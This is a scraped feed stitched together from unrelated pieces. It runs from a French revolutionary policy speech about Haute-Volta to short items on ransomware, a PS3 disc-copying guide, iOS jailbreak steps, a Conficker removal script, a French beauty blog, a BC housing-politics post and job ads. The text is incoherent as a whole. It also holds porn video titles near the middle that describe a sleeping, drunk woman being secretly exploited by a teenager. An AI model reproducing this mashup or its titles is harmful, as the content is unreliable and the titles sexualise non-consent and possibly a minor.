Nous devons nous efforcer de faire concorder nos actes à nos paroles, surveiller notre comportement social afin de ne pas prêter le flanc aux attaques des contre-révolutionnaires qui sont à l’affût. Avoir continuellement à l’esprit que l’intérêt des masses populaires prime sur l’intérêt personnel nous préservera de tout égarement.
L’activisme de certains militants caressant le rêve contre-révolutionnaire d’amasser des biens et des profits par le biais des CDR doit être dénoncé et combattu. Le vedettariat doit être éliminé. Plus vite ces insuffisances seront combattues, mieux cela vaudra pour la révolution.
Le révolutionnaire de notre point de vue, c’est celui qui sait être modeste tout en étant des plus déterminés dans les tâches qui lui sont confiées. Il s’en acquitte sans vantardise et n’attend aucune récompense.
Ces derniers temps nous constatons que des éléments qui ont pris part activement à la révolution et qui s’attendaient, pour ce faire, à ce que leur soient réservés des traitements privilégiés, des honneurs, des postes importants se livrent, par dépit, à un travail de sape parce qu’ils n’ont pas eu gain de cause. C’est la preuve qu’ils ont participé à la révolution sans jamais comprendre les objectifs réels. On ne fait pas de révolution pour se substituer simplement aux anciens potentats renversés. On rie participe pas à la révolution sous une motivation vindicative animée par l’envie d’une situation avantageuse : « ôte-toi de là que je m’y mette ». Ce genre de mobile est étranger à l’idéal de la révolution d’août et ceux qui le portent démontrent leurs tares de petits-bourgeois situationnistes quand ce n’est pas leur opportunisme de contre-révolutionnaires dangereux.
L’image du révolutionnaire que le CNR entend imprimer dans la conscience de tous, c’est celui du militant qui fait corps avec les masses, qui a foi en elles et qui les respecte. Il se départit de toute attitude de mépris vis-à-vis d’elles. Il ne se considère pas comme un maître à qui ces masses doivent obéissance et soumission. Au contraire, il se met à leur école, les écoute attentivement et fait attention à leurs avis. Il se départit des méthodes autoritaires dignes des bureaucrates réactionnaires.
Le révolution se distingue de l’anarchie dévastatrice. Elle exige une discipline et une ligne de conduite exemplaires. Les actes de vandalisme et les actions aventuristes de toute sorte, au lieu de renforcer la révolution par l’adhésion des masses, l’affaiblissent et repoussent loin d’elle les masses innombrables. C’est pourquoi les membres des CDR doivent élever leur sens des responsabilités devant le peuple et chercher à inspirer respect et admiration.
Ces insuffisances le plus souvent relèvent d’une ignorance du caractère et des objectifs de la révolution. Et pour nous en prémunir, il nous faut nous plonger dans l’étude de la théorie révolutionnaire. L’étude théorique élève notre compréhension des phénomènes, éclaire nos actions et nous prémunit de bien des présomptions. Nous devons désormais accorder une importance particulière à cet aspect de la question et nous efforcer d’être des exemples qui encouragent les autres à nous suivre.


Pour une révolutionnarisation de tous les secteurs de la société voltaïque

la révolution sera, n’en déplaise aux forces conservatrices et rétrogrades, un bouleversement total et profond qui n’épargnera aucun domaine, aucun secteur de l’activité économique, sociale et culturelle.

La révolutionnarisation de tous les domaines, de tous les secteurs d’activité, est le mot d’ordre qui correspond au moment présent. Fort de la ligne directrice ainsi dégagée, chaque citoyen, à quelque niveau qu’il se trouve, doit entreprendre de révolutionnariser son secteur d’activité.
D’ores et déjà, la philosophie des transformations révolutionnaires touchera les secteurs suivants : 1°) L’armée nationale ; 2°) La politique de la femme ; 3°) L’édification économique.



1°) L’armée nationale : sa place dans la Révolution démocratique et populaire


Selon la doctrine de défense de la Haute-Volta révolutionnaire, un peuple conscient ne saurait confier la défense de sa patrie à un groupe d’hommes quelles que soient leurs compétences. Les peuples conscients assument eux-mêmes la défense de leur patrie. A cet effet, nos Forces armées ne constituent qu’un détachement plus spécialisé que le reste du peuple pour les tâches de sécurité intérieure et extérieure de la Haute-Volta. De la même manière, bien que la santé des Voltaïques soit l’affaire du peuple et de chaque Voltaïque pris individuellement, il existe et existera un corps médical plus spécialisé et consacrant plus de temps à la question de la santé publique.

La révolution dicte aux Forces armées nationales trois missions :
- 1) Être en mesure de combattre tout ennemi intérieur et extérieur, et participer à la formation militaire du reste du peuple.Ce qui suppose une capacité opérationnelle accrue faisant de chaque militaire un combattant compétent au lieu de l’ancienne armée qui n’était qu’une masse de salariés.
1 00 - 2) Participer à la production nationale. En effet, le militaire nouveau doit vivre et souffrir au sein du peuple auquel il appartient. Finie l’armée budgétivore. Désormais, en dehors du maniement des armes, elle sera aux champs, elle élèvera des troupeaux de bœufs, de moutons et de la volaille. Elle construira des écoles et des dispensaires dont elle assurera le fonctionnement, entretiendra les routes et transportera par voie aérienne le courrier, les malades et les produits agricoles entre les régions. 

- 3) Former chaque militaire en militant révolutionnaire. Fini le temps où l’on prétendait à la réalité de la neutralité et de l’apolitisme de l’armée tout en faisant d’elle le rempart de la réaction et le garant des intérêts impérialistes !
Fini le temps où notre armée nationale se comportait tel un corps de mercenaires étrangers en territoire conquis ! Ce temps-là est désormais révolu à jamais. Armés de la formation politique et idéologique, nos soldats, nos sous-officiers et nos officiers engagés dans le processus révolutionnaire cesseront d’être des criminels en puissance pour devenir des révolutionnaires conscients, étant au sein du peuple comme un poisson dans l’eau.
Armée au service de la révolution, l’armée nationale populaire ne fera de place à aucun militaire qui méprise son peuple, le bafoue et le brutalise. Une armée du peuple au service du peuple, telle est la nouvelle armée que nous édifierons à la place de l’armée néo-coloniale, véritable instrument d’oppression et de répression aux mains de la bourgeoisie réactionnaire qui s’en sert pour dominer le peuple. Une telle armée, du point de vue même de son organisation interne et de ses principes de fonctionnement, sera fondamentalement différente de l’ancienne armée. Ainsi, à la place de l’obéissance aveugle des soldats vis-à-vis de leurs chefs, des subalternes vis-à-vis des supérieurs, se développera une discipline saine qui, tout en étant stricte, sera fondée sur l’adhésion consciente des hommes et des troupes.
Contrairement aux points de vue des officiers réactionnaires animés par l’esprit colonial, la politisation de l’armée, sa révolutionnarisation, ne signifie pas la fin de la discipline. La discipline dans une armée politisée aura un contenu nouveau. Elle sera une discipline révolutionnaire. C’est-à-dire une discipline qui tire sa force dans le fait que l’officier et le soldat, le gradé et le non-gradé se valent quant à la dignité humaine et ne diffèrent les uns des autres que par leurs tâches concrètes et leurs responsabilités respectives. Forts d’une telle compréhension des rapports entre les hommes, les cadres militaires doivent respecter leurs hommes, les aimer et les traiter avec équité.
Ici aussi, les Comités de défense de la révolution ont un rôle fondamental à jouer. Les militants CDR au sein de l’armée devront être les pionniers infatigables de l’édification de l’armée nationale populaire de l’État démocratique et populaire dont les tâches essentielles seront :
- 1) Sur le plan intérieur, la défense des droits et des intérêts du peuple, le maintien de l’ordre révolutionnaire et la sauvegarde du pouvoir démocratique et populaire.
- 2) Sur le plan extérieur, la défense de l’intégrité territoriale.



2°) La femme voltaïque : son rôle dans la Révolution démocratique et populaire

Notre révolution intéresse tous les opprimés, tous ceux qui sont exploités dans la société actuelle. Elle intéresse par conséquent la femme, car le fondement de sa domination par l’homme se trouve dans le système d’organisation de la vie politique et économique de la société. La révolution, en changeant l’ordre social qui opprime la femme, crée les conditions pour son émancipation véritable.
Les femmes portent sur elles l’autre moitié du ciel.
Créer une nouvelle mentalité chez la femme voltaïque qui lui permette d’assumer le destin du pays aux côtés de l’homme est une des tâches primordiales de la révolution. II en est de même de la transformation à apporter dans les attitudes de l’homme vis-à-vis de la femme.
Jusqu’à présent la femme a été exclue des sphères de décisions. La révolution, en responsabilisant la femme, crée les conditions pour libérer l’initiative combattante des femmes. Le CNR, dans sa politique révolutionnaire, travaillera à la mobilisation, à l’organisation et à l’union de toutes les forces vives de la nation et la femme ne sera pas en reste. Elle sera associée à tous les combats que nous aurons à entreprendre contre les diverses entraves de la société néo-coloniale et pour l’édification d’une société nouvelle. Elle sera associée, à tous les niveaux de conception, de décision et d’exécution, à l’organisation de la vie de la nation entière. Le but final de toute cette entreprise grandiose, c’est de construire une société libre et prospère où la femme sera l’égale de l’homme dans tous les domaines.

3°. Une économie nationale indépendante, auto-suffisante et planifiée au service d’une société démocratique et populaire.


le Conseil national de la révolution est conscient que l’édification d’une économie nationale, indépendante, auto-suffisante et planifiée passe par la transformation radicale de la société actuelle, transformation qui elle-même suppose les grandes réformes suivantes :
- La réforme agraire
- La réforme de l’administration
- La réforme scolaire
- La réforme des structures de production et de distribution dans le secteur moderne.


Peuple de Haute-Volta,
Camarades militantes et militants de la révolution :
Les besoins de notre peuple sont immenses. La satisfaction de ces besoins nécessite des transformations révolutionnaires à entreprendre dans tous les domaines.
Ainsi dans le domaine sanitaire et de l’assistance sociale en faveur des masses populaires, les objectifs à atteindre se résument en ceci :
- Une santé à la portée de tous.
- La mise en œuvre d’une assistance et d’une protection maternelle et infantile.
- Une politique d’immunisation contre les maladies transmissibles par la multiplication des campagnes de vaccination.
- Une sensibilisation des masses pour l’acquisition de bonnes habitudes hygiéniques.
Tous ces objectifs ne peuvent être atteints sans l’engagement conscient des masses populaires elles-mêmes dans le combat sous l’orientation révolutionnaire des services de santé.

Au vu de tous les problèmes auxquels notre pays se trouve confronté, la révolution apparaît comme un défi que nous devons, animés de la volonté de vaincre, surmonter avec la participation effective des masses populaires mobilisées au sein des CDR.
Dans un proche avenir, avec l’élaboration des programmes sectoriels, tout le territoire de Haute-Volta sera un vaste chantier de travail où le concours de tous les Voltaïques valides et en âge de travailler sera requis pour le combat sans merci que nous livrerons pour transformer ce pays en un pays prospère et radieux, un pays où le peuple sera le seul maître des richesses matérielles et immatérielles de la nation.
Enfin, il nous faut définir la place de la révolution voltaïque dans le processus révolutionnaire mondial. Notre révolution fait partie intégrante du mouvement mondial pour la paix et la démocratie contre l’impérialisme et toute sorte d’hégémonisme.

Dans notre lutte, les pays africains anti-impérialistes sont nos alliés objectifs. Le rapprochement avec ces pays est rendu nécessaire par les regroupements néo-coloniaux qui s’opèrent sur notre continent.
Vive la Révolution démocratique et populaire ! Vive le Conseil national de la révolution ! La patrie ou la mort, nous vaincrons !



Publié par le ministère burkinabè de l’ Information.








          How to stay protected against ransomware   

Ransomware is one of the most widespread and damaging threats that internet users face. Since the infamous Crypto Locker first appeared in 2013, we’ve seen a new era of file-encrypting ransomware variants delivered through spam messages and Exploit Kits, extorting money from home users and businesses alike.

The current wave of ransomware families can have their roots traced back to the early days of Fake AV, through “Locker” variants and finally to the file-encrypting variants that are prevalent today.


          Storage Efficient Substring Searchable Symmetric Encryption, by Iraklis Leontiadis and Ming Li   
We address the problem of substring searchable encryption. A single user produces a big stream of data and later on wants to learn the positions in the string that some patterns occur. Although current techniques exploit auxiliary data structures to achieve efficient substring search on the server side, the cost at the user side may be prohibitive. We revisit the work of substring searchable encryption in order to reduce the storage cost of auxiliary data structures. Our solution entails a suffix array based index design, which allows optimal storage cost $O(n)$ with small hidden factor at the size of the string $n$. We analyze the security of the protocol in the real ideal framework. Moreover, we implemented our scheme and the state of the art protocol \cite{Chase} to demonstrate the performance advantage of our solution with precise benchmark results. We improved the storage overhead of the encrypted index by a factor of $\mathbf{1.7}$ and the computation time thereof $\mathbf{4x}$ on $10^6$ character data stream.
          can you copy ps3 games? - make working copies of ps3 games   
Is it possible to copy PS3 games? That is the question on many peoples lips when finding out ways to exploit the power and potential of this engaging console machine. Well thanks to never-ending testing and research there is a way to backup PS3 game discs just like you can burn XBox and PS2 games in the past. All you need is a {computer|P. Computer, blank dvd discs, dvd burner and some PS3 copy software.
The method of copying ps3 games is quite simple and there's just a couple of things you must complete the task.
The software works just like your conventional burning applications that people use for making DVD and Music cd backups. Just grab a PS3 game you want to copy and pop it into the dvd burner tray. The software will prompt you to select and option to form an image of the game, click'Yes' and then chill out and let it do its work, the program will copy over all the PS3 games information to your computers hard drive.

This procedure can take some time depending on your computers processing power so to be certain it works correctly leave your computer to do its thing and go find something else to do.
When the task has been finished the software wil tell you that all the files have been transfered to your PC as an image or .ISO file. The very next step is to burn the image to a blank disc, so take away the game dvd and place a blank disc into your burner, then click the choice to'Burn Image to Disc'. Usually you would employ a separate piece of software to perform this operation. But now you have PS3 copy software that will do it all for you.



So there you have it! You can now burn and play PS3 games and have the comfort that your originals that your acquired are safe from harm!

To learn more about this PS3 copy software then please visit - How to Burn PS3 games
.
          9 Signs You’re Dating A Feminist And How To Deal With Her   

Articles implying how feminism destroys relationships or how it creates a barrier among men and women leave me disturbed. The problem arises when women seek dominance and degrade their partners to exercise their incorrect beliefs or when men are afraid of letting go of their patriarchal benefits. With this, it is safe to say that feminism is not the killer of relationships. The lack of understanding of what feminism truly meant is. According to Bell Hook, “Feminism is a movement to end sexism, sexist exploitation, and oppression.” It’s not exclusive to women, seeking equality. In fact, there are men who

The post 9 Signs You’re Dating A Feminist And How To Deal With Her appeared first on This Relationship.


          Why iPhone iOS 8 Jailbreak Became Pointless   
It might have become pointless to perform iOS 8 jailbreak on the iPhone and iPad. Here is more information about this jailbreak.

Apple will soon release its new iOS 8 to users and a lot of people are already waiting for hackers to release iOS 7.1.2 jailbreak. Most iDevice owners would be happy to see the new jailbreak 24 hours after the official launch of the new firmware, and hackers are as excited about this as people are.

As Stefan Esser better known in the jailbreaking community as i0n1c notes, there will be no point in creating jailbreak for iOS 8. This hacker is actually trying to create the first firmware 8 jailbreaking solution and present it quickly after the official release of the operating system update, just “in a few hours” after the launch.



Are there still reasons to jailbreak iOS 8? 

The new firmware has a lot of new features with over 4+ thousand app programming interfaces, numerous settings and extra options not available in previous firmware versions. Users mostly jailbreak their iPhones and iPads because they want to install third-party games, apps, interesting tweaks, hacks and customization features that will never appear in the official App Store but are present in the jailbreak app store called Cydia.

Apple is trying to do everything to patch holes in exploits found by hackers as quickly as possible, introduce more options for users to prevent them from jailbreaking and even hiring famous hackers to work for the ‘fruit’ giant.

 Why There Is No Point in Jailbreaking iOS 8

There will be a lot of new extensions in the next firmware thus iPhone iOS 8 jailbreak might become pointless for users who prefer not voiding Apple warranty on their new smartphone or tablet device. People who wish to get more will continue jailbreaking and pay no attention at the slight signal that points to the end of jailbreaking.

What do you think about all the features added by Apple and promised in the future releases? Do you think jailbreak will leave forever or will it one day truly become aimless?

          iOS 7.1.1 Jailbreak Bootloop: How to Solve the Problem   

The only iOS 7.1.1 jailbreak available today for iPhone, iPad and iPod touch devices have been launched by hackers from China. The team behind this exploit has created programs to support Windows and Mac. The interface is now available in English to support foreign users who wish to jailbreak their iDevices but don’t want to see everything in Chinese.

The first version of Pangu used the exploit found by i0n1c who isn’t happy about this. As he tweeted recently, it is surely “no way okay” when someone presents a public jailbreak with the vulnerability found by Stefan Esser also known as i0n1c. This well-known hacker revealed his exploits to students at one of the training courses for hackers. But now the Chinese team assures they have swapped out the holes discovered by Esser and moved to new exploits.


The version 1.1 of the new Pangu 7.1.1 jailbreak untethered seems to burn at least two exploits. As Esser notes, they are simply “wasting ever more bugs on something unimportant” as the minor update with Mac support can only offer untethered 7.1.1 jailbreak and nothing more.

While the jailbreaking community doesn’t like what Chinese hackers did some users take advantage of using iOS 7.1.1 exploit and jailbreaking their iDevice. The question is what users will do after Apple officially releases its next big iOS 8 update with most exploits killed right now? Will hackers create a new program or update their old one to support the untethered jailbreaking of this next firmware?

It doesn’t look like Chinese guys want to save their vulnerabilities for new versions. What do you think about their release and possible plans for the future? Do you believe they will find more holes in the mobile operating system?
          Google Offers New Gmail APIs for App Developers   
If you are developing iOS and Google apps, games you should know about new APIs released by Google for Gmail.

Google has changed some rules for its developers introducing the new Gmail APIs for developers who create games and applications. This update helps to make programs that are not limited by IMAP used previously by them for linking emails to servers in an ordinary way.


IMAP has been designed to do its task and now des are welcome to go beyond the limitations with new Google APIs. (You can also read about iOS 8 API credit card, the new feature from Apple). With the recent introduction you get more options because these new Gmail APIs allow getting RESTful access to the list of emails using the authentication known as OAuth 2.0. Putting everything in simple way, if you develop for different platforms, iOS, Android, Windows etc. you can make your applications and games much better allowing your customers [users] controlling how to have the email accessed.

You can Google the new APIs for Gmail and get more information about these changes. This is surely more interesting to devs than ordinary users. How will this change the apps and games? We don’t know yet but it will be interesting to see all the future improvements.

While devs get the new information, some hackers keep working on iOS 8 jailbreak. There is no exploit release for public yet and we will not see one until Apple releases this new firmware in September. Evad3rs are expected to present the solution this year still users are following the new players in the jailbreaking community, hackers from China who launched their Pangu iOS 7.1.1 jailbreak earlier this week making millions of users happy as this is the untethered solution and the only program that can jailbreak firmware 7.1.1 these days.

          iOS 7.1.1 Jailbreak Pangu for Linux and English Version Coming Soon   
Chinese developers promise to update their untethered 7.1.1 jailbreak Pangu with English version and plan to release Linux build.

The first jailbreak 7.1.1 with English version is coming soon. This has been confirmed by Pangu hackers from China who have released their Pangu exploit for 7.1.1 firmware versions earlier this week.

The program now supports only Windows PC but hackers assure that their iOS 7.1.1 jailbreak pangu for Linux should also be launched this year. The news was shared through Weibo hackers’ account [this service is similar to Twitter]. They will also present Mac version of the jailbreaking program which is great as more users will be able to perform jailbreak on their iPod touch, iPad and iPhone.



iOS 7.1.1 jailbreak pangu English version should be available for all platforms meaning you’ll understand everything yourself no matter if you are jailbreaking on Mac, PC or Linux computer. Right now a lot of screens of the program are in Chinese or get question marks instead of letters.

Users who were the first to download Pangu untethered 7.1.1 jailbreak met the 80M sized file because hackers didn’t compress the Cydia package trying to release the exploit for public as soon as possible. They promise to solve the issue for next updates.

You can try jailbreaking right away or keep waiting till other famous and now trusted hackers present their versions of jailbreak for firmware 7.1.x.

          How to Jailbreak iOS 7.1.1 Using Pangu Tool   

Hackers from China known as Pangu have presented iOS 7.1.1 untethered jailbreak Pangu for iOS 7.1 and 7.1.1 firmware. According to users who have already risked to install this exploit, the new Pangu jailbreak 7.1.1 works and installs Cydia on the Home screen.

Of course, this is not Evasi0n or p0sixspwn most people are used to by now. The new Chinese program is in Chinese language, but it does its job no matter what.


The exploit now supports only Windows computers. Mac users are out of luck for now, bu this might change in the future. You can visit the official hackers’ site at http://pangu.io/ to download the program and learn more about this tool.

As the site notes, the new jailbreak for iOS 7.1.1 supports these models: iPhone touch 5G, iPhones 4, 4S, 5S, 5c and 5, and iPad Air, iPad mini with Retina screen. The tool should also support iPad 2, 3, and 4.

The jailbreak is present as the .exe file for your PC. Its size is over 70 MB. Chinese developers don’t mention what software they used to create it. As iH8sn0w notes, the program doesn’t seem to have any malicious trails.

Members on Reddit report they have no problems with this jailbreak and are already having Cydia on the iOS 7.1.1 iPhone 5S, iPhone 5 and other models.

It is not difficult to jailbreak untethered your iDevice.

Step 1. Backup using iTunes program or iCloud. It’s your choice. Remember that you are jailbreaking at your own risks.

Step 2. Download the jailbreak from Pangu official site.

Step 3. Run the downloaded file as an Administrator.


Step 4. There are some confusions you will come across. As seen in this image, there is a checkmark you must uncheck and the jailbreak button is black with question marks. After you uncheck the box, click on this black button to begin.

Step 5. You will see the instructions. Follow them and change your date to June 2nd. The date can be adjusted in Settings app. Go to General menu and select Date & Time. The program will continue after you successfully set your iDevice to June 2.

Step 6. You will see Pangu icon on your handset or tablet. Click on it to continue.

Step 7. Your device should reboot. Wait till you get Cydia.

This is it. Enjoy being jailbroken on iOS 7.1.1 with Pangu!
          Dabeudi dabeuda   

Lire le titre et ne rien piger.
Regarder la photo.
Relire le titre et ne toujours rien piger.
Re-regarder la photo...

* lumière * ding ! *

Rigoler et se mettre à chanter.

Eau-florale-Bleuet.jpg
(Se mettre à chanter... Pour le reste de la journée. Ne me remercie pas, Daft Punk Eiffel 65 dans la tête pour les prochaines 24 heures, c'est cadeau) (Merci à la patatophile au regard acéré qui a corrigé ma confusion d'interprète !)

Or donc, je l'avions oncques mentionné en passant, depuis l'été dernier j'ai adopté cette eau florale bio de chez Sanoflore pour défatiguer le contour de mes yeux qui commence à salement accuser les nuits sans sommeil et les années accumulées.
Pour tout t'avouer, j'ai commencé à l'utiliser un lendemain d'apéro-mojito, après m'être fait peur en croisant mon reflet dans le miroir de la salle de bains : j'ai pleurniché un peu sur ma jeunesse enfuie et ma fraîcheur envolée, sur cette cruelle pensée "Et ben heureusement qu'il n'y a pas un mec pour me voir au réveil, il s'enfuirait !", et puis j'ai passé un quart d'heure dans mon fauteuil de mémé (Celui qui s'incline en arrière et qui a un repose-pied, mais qui n'est pas un Stressless paske ça coûte un bras et que ça fait VRAIMENT trop mémé), à semi-somnoler avec un chat sur les genoux et des cotons à démaquiller imbibés de bleuet sur les yeux. Hashtag les joies du célibat.

Du bleuet messicole, mesdames et messieurs !
C'est à dire du vrai bleuet sauvage, "vivant dans les moissons" comme dans l'ancien temps (Pas si ancien d'ailleurs, car je m'en souviens encore et j'ai grandi en gambadant dans les champs et les années 80) (Zeugma, 10 points !) (Et mot compte triple).
Messicole est en effet le terme utilisé pour désigner des plantes herbacées annuelles qui ne se développent que dans les champs de céréales cultivées, où elles sont considérées - à tort, si vous voulez mon humble avis, car elles sont si jolies - comme de la mauvaise herbe. Le développement de l'agriculture intensive et une gestion à courte vue (comprendre à coups d'herbicides et sans se préoccuper de l'importance de la biodiversité) des ressources de la planète ont conduit à une raréfaction, voire à une menace de disparition, des deux principales plantes messicoles qui décoraient naguère les champs et leurs fossés : le coquelicot et le bleuet.

C'est d'autant plus dommage pour le bleuet, qu'il a des propriétés apaisantes pour les yeux qui sont connues et exploitées depuis bien longtemps. Sanoflore n'a certainement pas inventé la décoction de fleur de bleuet pour décongestionner les paupières, mais garantit en tout cas de n'utiliser que du bleuet sauvage issu de champs bio, dont les fleurs ont été distillées à la vapeur d'eau pour préserver au mieux leurs propriétés.

Ils ne m'ont pas sponsorisée pour en parler (Damned !) mais c'est un contexte que je trouve important de préciser.

Moyennant quoi, ce flacon-pschiit de 200 mL d'eau florale de bleuet bio (Assez moche mais il paraît que la couleur sombre est indispensable pour préserver l'eau florale de l'influence néfaste de la lumière) a rejoint ma salle de bains, et je m'accorde de temps en temps - plus précisément, je me force à prendre - un moment de détente et d'apaisement. Du contour de l'oeil autant que du mental, quand j'arrive à faire taire mon cerveau suffisamment pour en faire un moment de méditation.

Quand Miss PotatoCat m'y autorise, aussi.
Car il arrive parfois qu'au lieu de se détendre et de venir gentiment s'installer sur mes genoux pour ronronner, le vilain félin éprouve devant cette vision de son humaine immobile et silencieuse dans un fauteuil de mémé avec des cotons blancs sur les yeux... de la peur ? Ou bien elle me croit morte et elle se dit qu'elle peut me bouffer en toute impunité ? Ou bien c'est juste un chat : complètement tarée et née pour faire ch... ?
Quoi qu'il en soit, parfois ma tentative de détente est alors stoppée net par l'attaque surprise de 6 ou 7 kilos de félin démoniaque qui me percutent l'estomac avec élan. Et comme j'ai des cotons sur les yeux, les paupières fermées en dessous, et l'esprit tourné vers la méditation, je ne la vois pas arriver, la sale bête !

(Mais à part ce léger inconvénient félin, l'eau de bleuet me fait beaucoup de bien)



          DÉVELOPPEUR JAVA FULL-STACK (H/F) - ON-X - Ontario   
Système d'exploitation/ virtualisation ( Linux, Windows, VMware, Docker ). En qualité de Développeur Full-Stack , vous réaliserez les missions suivantes :....
From ON-X - Thu, 06 Apr 2017 07:41:27 GMT - View all Ontario jobs
          The gutting of the Foreign Buyer's Tax - might it be Krusty's Achilles Heel?   

In our last post we outlined how the our intrepid Premier, Krusty Clark, and the BC Liberals appear to had bowed to pressure from the Real Estate Development community and gutted the 15% Foreign Buyers tax implemented last summer.

Muckraker extraordinaire Bob Mackin advises sources tell him bigwig Developers threatened to withhold huge political donations to the BC Liberals unless they guttered that tax.


Krusty and Co. caved and not only undid the immensely popular move that addressed an out of control real estate market, but they also threw short term fuel on the housing bonfire by introducing a first time home buyers plan that gives young kids the necessary downpayment to get into the housing market. The introduction of this latest moral hazard into the housing mix is just the panacea the condo developers needed to boost a sagging real estate market in clear correction mode.

Combined with the gutting of the 15% Foreign Buyers tax, it will be interesting to see the results at the end of the month.

Just how significantly are the FB tax changes

Another growing name in muckraking media hall of fame is Ian Young, who writes for the South China Morning Post.  In a regular column titled "the Hongcouver" (a title which would have gotten any caucasian crucified by the PC crowd), Young outlines Vancouver’s foreign buyer tax and the work-permit loophole ‘you could drive Highway 99 through’

Young outlines how the rationale for the BC Liberal governments plan to offer exemptions to the tax is sound "assuming that the goal of the tax is to improve affordability by preventing foreign capital further skewing a market that had become detached from local incomes (and is not, say, a pre-election political tactic)."

The theory is that people who live and earn locally should not be unfairly punished.

But when you look at the changes, even the simple minded can see the real intentions of the changes.  As Young writes, "offering foreign-buyer-tax exemptions to work permit holders was a 'Swiss cheese' proposal. “The term ‘work permit’ is too vague to implement the intention (as) foreign-funded buyers pursue permits primarily to escape the tax. There’s a risk that new grads, backed by foreign funds and/or acting as proxies, will dive in."

With less than 100 days to the Provincial election, the BC Liberals are in full campaign mode.  Desperate to preserve political donations, they pragmatically axed the popular move they made last summer by responding to overwhelming public demand to deal with the massive amount of cash (created by the unprecedented excess credit being created in China) sloshing around the world.

But in doing so, the BC Liberals may have created a weakness in their election machine which the politically adept should be exploiting like they were the rebel alliance attacking the Death Star.

The link between the changes and Real Estate Development slush fund money slaps you in the face.  Public anger has not abated from the damaging effects all this malinvestment is having on our communities.

The only saving grace for the BC Liberals may be the inept BCNDP and the mainstream media.

Rather than fully focus on the link, the spotlight has been on a pointless harangue about false allegations of BCNDP computer hacking by the BC Liberals.

No one cares.

And in the process the real scandal that should inflame the voting public is being shoved to the back pages.

It is exactly these types of scandals which ultimately brought down the BC Socreds and Bill Vander Zalm, Glen Clark's NDP, and lead to the resignation of Gordon Campbell.

But BCNDP political ineptitude appears to reign supreme. Horgan has failed to capitalize.

The Vancouver Sun is showing signs of following up, but Krusty is deftly promoting the entry level buyer angle and is successfully throwing up teflon on the silly computer hacking story.

We'd be willing to suggest that throwing the R/E Industry the 'first time homebuyers' bone would have been sufficient to address donation slippage. Gutting the Foreign Buyers Tax and the apparent linkage to massive R/E Developer political donations is their achilles heel.

Will the BCNDP exploit this explosive connection?

The gutting of the Foreign Buyers tax is THE fulcrum that could swing the 2017 election.  

So far the Opposition has failed to capitalize on it.

==================

Photobucket
Email: village_whisperer@live.ca
Click 'comments' below to contribute to this post.

Please read disclaimer at bottom of blog.

          Sleeping Drunk Stepmom Gets Secretly Exploited By Nerd Teenager   
Watch Sleeping Drunk Stepmom Gets Secretly Exploited By Nerd Teenager at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          7 Step eradicate virus' Conficker '   

Jakarta - Virus' Conficker.DV 'using the distribution method that is different from preceding. With the powerful, the virus tries to access the network using a slit windows' Default Share '(ADMIN$ \ system32) with the administrator password.


In addition, 'Conficker.DV' also create a file on removable media such as flash, hard drive and card reader to save the file in the hidden root drive.

While the action preceding the same, that is trying mengexploitasi MS08-067 security slit or Windows, or Windows Server Service SVCHOST.exe. Many of the infected user does not activate because Automatic Updates feature and does not do windows patch MS08-067.

If you are like, see step 7 short of the virus analyst Adi Saputra Vaksincom to eradicate the virus' Conficker.DV 'received detikINET, Wednesday (28/1/2009):

1. Disconnect the computer that will be cleared from the network / Internet.
2. Turn off system restore (Windows XP / Vista).
3. Turn off the virus is active in the services. Use Norman's removal tool to clean the virus is active. If you do not have, can be downloaded at the site norman.
4. Delete service svchost.exe enter in a fake virus on the registry. You can search the registry manually.
5. Remove Task Schedule made by the virus. (C: \ WINDOWS \ Tasks)
6. Remove string registry created by the virus. To facilitate the registry can use the script below:

[Version]
Signature="$Chicago$"
Provider=Vaksincom Oyee

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,
Hidden, 0x00000001,1
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced,
SuperHidden, 0x00000001,1
HKLM,
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,
CheckedValue, 0x00000001,1
HKLM, SYSTEM\CurrentControlSet\Services\BITS, Start, 0x00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\ERSvc, Start, 0x00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\wscsvc, Start, 0x00000002,2
HKLM, SYSTEM\CurrentControlSet\Services\wuauserv, Start, 0x00000002,2

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, dl
HKCU, Software\Microsoft\Windows\CurrentVersion\Applets, ds
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, dl
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\Applets, ds
HKLM, SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, TcpNumConnections


Use notepad, then save with the name 'repair.inf', then 'Save As Type' to 'All Files' so that the error does not occur. Repair.inf run with the right-click and select install.

Meanwhile, for the active file on startup, you can mendisable through 'msconfig' or you can manually delete the string: 'HKLM, SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run'

7. For cleaning the virus W32/Conficker.DV optimally and prevent re-infection, you should use antivirus and update the virus is able to detect and properly patch your computer with the official patch from Microsoft to prevent re-infection.

          Wife exploited by Janitor   
Watch Wife exploited by Janitor at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          Faire un logo gratuitement en moins de 10 minutes !   

Grâce à cet article, vous serez en mesure de pouvoir concevoir un logo simple et efficace, le tout gratuitement et en moins de 10 minutes ! Ce ne sera bien évidemment pas un logo digne de la pomme d’Apple et de la virgule de Nike, mais vous pourrez exploiter votre création sans rougir face aux […]

Cet article Faire un logo gratuitement en moins de 10 minutes ! est apparu en premier sur Wecode.


          Automation QA Analyst - Web/Mobile - QHR Technologies - Kelowna, BC   
Clients and developers. Exploiting loopholes in user interfaces and bursting developer bubbles. Our Virtual Care patient....
From QHR Technologies - Wed, 14 Jun 2017 23:50:50 GMT - View all Kelowna, BC jobs
          Five Leadership Lessons From A Week With Richard Branson   

Sir Richard Branson is a man I’ve admired as long as I remember. His books – jammed with stories of his entrepreneurial exploits and intrepid adventures on earth, sky and space – sit atop my bookshelves, their pages underlined with insights on taking risks, managing setbacks and living bravely. So when the opportunity arose via […]

The post Five Leadership Lessons From A Week With Richard Branson appeared first on Margie Warrell.


          Retail Host - BBC - Cardiff CF10   
Business activities range from TV sales and channel operation to production and intellectual property exploitation, Commerce....
From BBC - Thu, 01 Jun 2017 15:12:23 GMT - View all Cardiff CF10 jobs
          Digital : Now Or Never   

